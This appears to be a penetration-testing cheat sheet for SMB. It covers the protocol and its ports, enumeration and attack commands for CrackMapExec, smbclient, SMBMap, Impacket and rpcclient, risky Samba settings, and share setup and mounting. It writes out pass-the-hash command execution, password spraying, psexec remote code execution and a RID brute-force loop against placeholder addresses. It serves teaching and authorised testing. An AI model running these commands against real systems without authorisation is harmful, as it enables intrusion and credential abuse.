SMB

SMB Security & Exploitation Guide

1. About SMB

Server Message Block (SMB) is a client server protocol that provides shared access to:

  • Files and directories

  • Printers

  • Routers and interfaces

It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.

Default Ports:

  • NetBIOS over TCP: 137, 138, 139

  • Direct SMB (CIFS): 445


2. Tools for SMB Interaction

CrackMapExec (CME)

A powerful tool for SMB enumeration and exploitation.

  • Pass-the-Hash or Command Execution:

    crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami
  • Null-session login and share enumeration:

    crackmapexec smb 203.0.113.5 -u '' -p '' --shares
  • Userlist checking:

    crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success
  • User=Password spray attack:

    crackmapexec smb 198.51.100.20 -u users.txt -d . --no-bruteforce --continue-on-success

Samba

An open-source implementation of SMB/CIFS on Unix-based systems.

  • Configuration file: /etc/samba/smb.conf

  • Check active connections:

    smbstatus
  • Inspect config (excluding comments):

    cat /etc/samba/smb.conf | grep -v "#\|\;"

smbclient

A command-line tool to interact with SMB shares.

  • List available shares (null session):

    smbclient -N -L //192.0.2.10
  • Connect to a share:

    smbclient -U username \\\\192.0.2.10\\share
  • Useful commands:

    • help → show available commands

    • ls → list files

    • get <file> → download a file

    • !<cmd> → run local system command


SMBMap

Automation tool for SMB enumeration and file operations.

  • Basic enum:

    smbmap -H 192.0.2.10
  • Recursive enum:

    smbmap -H 192.0.2.10 -r share
  • Download a file:

    smbmap -H 192.0.2.10 --download "share/example.txt"
  • Upload a file:

    smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"

Impacket Tools

Impacket provides Python scripts for SMB interaction and exploitation.

  • SMB client:

    impacket-smbclient 'rio@corp.local' -no-pass
  • Run SMB server:

    sudo impacket-smbserver share ./ -smb2support
  • Remote code execution:

    impacket-psexec administrator:'mypass@123'@192.0.2.10

    (Same applies for smbexec and atexec.)


RPCclient

RPC (Remote Procedure Call) allows process-to-process communication across systems.

  • Connect (null session):

    rpcclient -U "" 192.0.2.10
  • Invoke commands:

    rpcclient $> enumdomusers
    rpcclient $> queryuser <RID>
  • RID Brute Force (users/groups enumeration):

    for i in $(seq 500 1100); do \
    rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \
    | grep "User Name\|user_rid\|group_rid" && echo ""; done

Alternative: use samrdump.py, enum4linux, or enum4linux-ng:

./enum4linux-ng.py 192.0.2.10 -A

Windows Net Command

net use \\DC01\ipc$ "" /u:""

3. Dangerous SMB Configuration Settings

  • browseable = yes → Shares are visible in network browsing.

  • read only = no → Users can create and modify files.

  • writable = yes → Full write permissions allowed.

  • guest ok = yes → Anonymous logins permitted.

  • enable privileges = yes → Honors user privileges (may be abused).

  • create mask = 0777 → New files created with world read/write permissions.

  • directory mask = 0777 → New directories created with world read/write permissions.

  • logon script = script.sh → Executes script at user login.

  • magic script = script.sh / magic output = script.out → Dangerous auto-execution functionality.


4. Creating a Share (Windows 10 Example)

  1. Create a folder.

  2. Use Advanced Sharing to share the folder.

  3. Configure both SMB share permissions and NTFS permissions.

    • SMB permissions control network access.

    • NTFS permissions control file system access.

  4. Inherited permissions are marked grey (from parent directory).


5. Mounting SMB Shares (Linux)

sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/

Last updated